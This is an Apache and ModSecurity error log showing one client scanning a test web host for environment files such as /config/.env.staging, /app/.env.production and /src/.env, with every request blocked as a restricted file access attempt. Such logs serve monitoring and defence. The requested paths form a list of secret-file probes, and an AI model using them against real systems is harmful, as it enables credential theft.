[Fri Jan 16 03:21:41.698096 2026] [:error] [pid 1444035] [client 45.148.10.246:51260] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.staging/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging/"] [unique_id "aWmgtbauW6yeGWXfDeFYiwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging/
[Fri Jan 16 03:21:41.698331 2026] [:error] [pid 1444035] [client 45.148.10.246:51260] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging/"] [unique_id "aWmgtbauW6yeGWXfDeFYiwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging/
[Fri Jan 16 03:21:41.698520 2026] [:error] [pid 1444035] [client 45.148.10.246:51260] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging/"] [unique_id "aWmgtbauW6yeGWXfDeFYiwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.staging/
[Fri Jan 16 03:21:41.837387 2026] [:error] [pid 1444033] [client 45.148.10.246:51276] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtdLJkp65ULFQ2YYjOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.staging
[Fri Jan 16 03:21:41.837627 2026] [:error] [pid 1444033] [client 45.148.10.246:51276] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtdLJkp65ULFQ2YYjOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.staging
[Fri Jan 16 03:21:41.837793 2026] [:error] [pid 1444033] [client 45.148.10.246:51276] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgtdLJkp65ULFQ2YYjOAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.staging
[Fri Jan 16 03:21:41.980897 2026] [:error] [pid 1444034] [client 45.148.10.246:51290] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgteRfEYyDES-ZFL4iyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.staging
[Fri Jan 16 03:21:41.981140 2026] [:error] [pid 1444034] [client 45.148.10.246:51290] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgteRfEYyDES-ZFL4iyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.staging
[Fri Jan 16 03:21:41.981342 2026] [:error] [pid 1444034] [client 45.148.10.246:51290] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.staging"] [unique_id "aWmgteRfEYyDES-ZFL4iyQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.staging
[Fri Jan 16 03:21:42.150489 2026] [:error] [pid 1444032] [client 45.148.10.246:51298] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtukMvq8uPO2ZciWrYAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev
[Fri Jan 16 03:21:42.150743 2026] [:error] [pid 1444032] [client 45.148.10.246:51298] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtukMvq8uPO2ZciWrYAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev
[Fri Jan 16 03:21:42.150898 2026] [:error] [pid 1444032] [client 45.148.10.246:51298] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtukMvq8uPO2ZciWrYAAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev
[Fri Jan 16 03:21:42.349083 2026] [:error] [pid 1444040] [client 45.148.10.246:51308] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.dev/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev/"] [unique_id "aWmgtvn_5sIyKhJ5GAza8gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev/
[Fri Jan 16 03:21:42.349319 2026] [:error] [pid 1444040] [client 45.148.10.246:51308] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev/"] [unique_id "aWmgtvn_5sIyKhJ5GAza8gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev/
[Fri Jan 16 03:21:42.349477 2026] [:error] [pid 1444040] [client 45.148.10.246:51308] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev/"] [unique_id "aWmgtvn_5sIyKhJ5GAza8gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/config/.env.dev/
[Fri Jan 16 03:21:42.695522 2026] [:error] [pid 1444031] [client 45.148.10.246:51316] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtn-9MmrgwjmYTAJT5QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.dev
[Fri Jan 16 03:21:42.695765 2026] [:error] [pid 1444031] [client 45.148.10.246:51316] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtn-9MmrgwjmYTAJT5QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.dev
[Fri Jan 16 03:21:42.695951 2026] [:error] [pid 1444031] [client 45.148.10.246:51316] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.dev"] [unique_id "aWmgtn-9MmrgwjmYTAJT5QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.dev
[Fri Jan 16 03:21:43.266658 2026] [:error] [pid 1444033] [client 45.148.10.246:51336] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt9LJkp65ULFQ2YYjOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.test
[Fri Jan 16 03:21:43.266887 2026] [:error] [pid 1444033] [client 45.148.10.246:51336] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt9LJkp65ULFQ2YYjOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.test
[Fri Jan 16 03:21:43.267052 2026] [:error] [pid 1444033] [client 45.148.10.246:51336] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt9LJkp65ULFQ2YYjOQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//config/.env.test
[Fri Jan 16 03:21:43.487222 2026] [:error] [pid 1444034] [client 45.148.10.246:51352] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt-RfEYyDES-ZFL4iygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.test
[Fri Jan 16 03:21:43.487451 2026] [:error] [pid 1444034] [client 45.148.10.246:51352] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt-RfEYyDES-ZFL4iygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.test
[Fri Jan 16 03:21:43.487650 2026] [:error] [pid 1444034] [client 45.148.10.246:51352] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env.test"] [unique_id "aWmgt-RfEYyDES-ZFL4iygAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./config/.env.test
[Fri Jan 16 03:21:43.644465 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:51358] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: http://economiasolidale.test.indacotrentino.com/app/.env
[Fri Jan 16 03:21:43.833118 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:51366] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: http://economiasolidale.test.indacotrentino.com/app/.env/
[Fri Jan 16 03:21:43.986531 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:51370] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: http://economiasolidale.test.indacotrentino.com//app/.env
[Fri Jan 16 03:21:44.113913 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:51386] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env, referer: http://economiasolidale.test.indacotrentino.com/./app/.env
[Fri Jan 16 03:21:44.270472 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:51400] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.local, referer: http://economiasolidale.test.indacotrentino.com/app/.env.local
[Fri Jan 16 03:21:44.452211 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:51408] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.local, referer: http://economiasolidale.test.indacotrentino.com/app/.env.local/
[Fri Jan 16 03:21:44.626947 2026] [authz_core:error] [pid 1444032] [client 45.148.10.246:51410] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.local, referer: http://economiasolidale.test.indacotrentino.com//app/.env.local
[Fri Jan 16 03:21:44.768633 2026] [authz_core:error] [pid 1444040] [client 45.148.10.246:51420] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.local, referer: http://economiasolidale.test.indacotrentino.com/./app/.env.local
[Fri Jan 16 03:21:44.949185 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:51422] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.production, referer: http://economiasolidale.test.indacotrentino.com/app/.env.production
[Fri Jan 16 03:21:45.085031 2026] [authz_core:error] [pid 1444035] [client 45.148.10.246:51428] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.production, referer: http://economiasolidale.test.indacotrentino.com/app/.env.production/
[Fri Jan 16 03:21:45.279124 2026] [authz_core:error] [pid 1444033] [client 45.148.10.246:51440] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.production, referer: http://economiasolidale.test.indacotrentino.com//app/.env.production
[Fri Jan 16 03:21:45.419313 2026] [authz_core:error] [pid 1444034] [client 45.148.10.246:51452] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.production, referer: http://economiasolidale.test.indacotrentino.com/./app/.env.production
[Fri Jan 16 03:21:46.211976 2026] [authz_core:error] [pid 1444031] [client 45.148.10.246:51484] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env.staging, referer: http://economiasolidale.test.indacotrentino.com/./app/.env.staging
[Fri Jan 16 03:21:46.367285 2026] [:error] [pid 1444035] [client 45.148.10.246:51498] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgurauW6yeGWXfDeFYjgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env
[Fri Jan 16 03:21:46.367510 2026] [:error] [pid 1444035] [client 45.148.10.246:51498] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgurauW6yeGWXfDeFYjgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env
[Fri Jan 16 03:21:46.367672 2026] [:error] [pid 1444035] [client 45.148.10.246:51498] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmgurauW6yeGWXfDeFYjgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/src/.env
[Fri Jan 16 03:21:46.473980 2026] [:error] [pid 1444033] [client 45.148.10.246:51508] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env/"] [unique_id "aWmgutLJkp65ULFQ2YYjPAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env/
[Fri Jan 16 03:21:46.474207 2026] [:error] [pid 1444033] [client 45.148.10.246:51508] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env/"] [unique_id "aWmgutLJkp65ULFQ2YYjPAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env/
[Fri Jan 16 03:21:46.474398 2026] [:error] [pid 1444033] [client 45.148.10.246:51508] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env/"] [unique_id "aWmgutLJkp65ULFQ2YYjPAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/src/.env/
[Fri Jan 16 03:21:46.651435 2026] [:error] [pid 1444034] [client 45.148.10.246:51520] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmguuRfEYyDES-ZFL4izQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//src/.env
[Fri Jan 16 03:21:46.651715 2026] [:error] [pid 1444034] [client 45.148.10.246:51520] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmguuRfEYyDES-ZFL4izQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//src/.env
[Fri Jan 16 03:21:46.651921 2026] [:error] [pid 1444034] [client 45.148.10.246:51520] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/src/.env"] [unique_id "aWmguuRfEYyDES-ZFL4izQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//src/.env
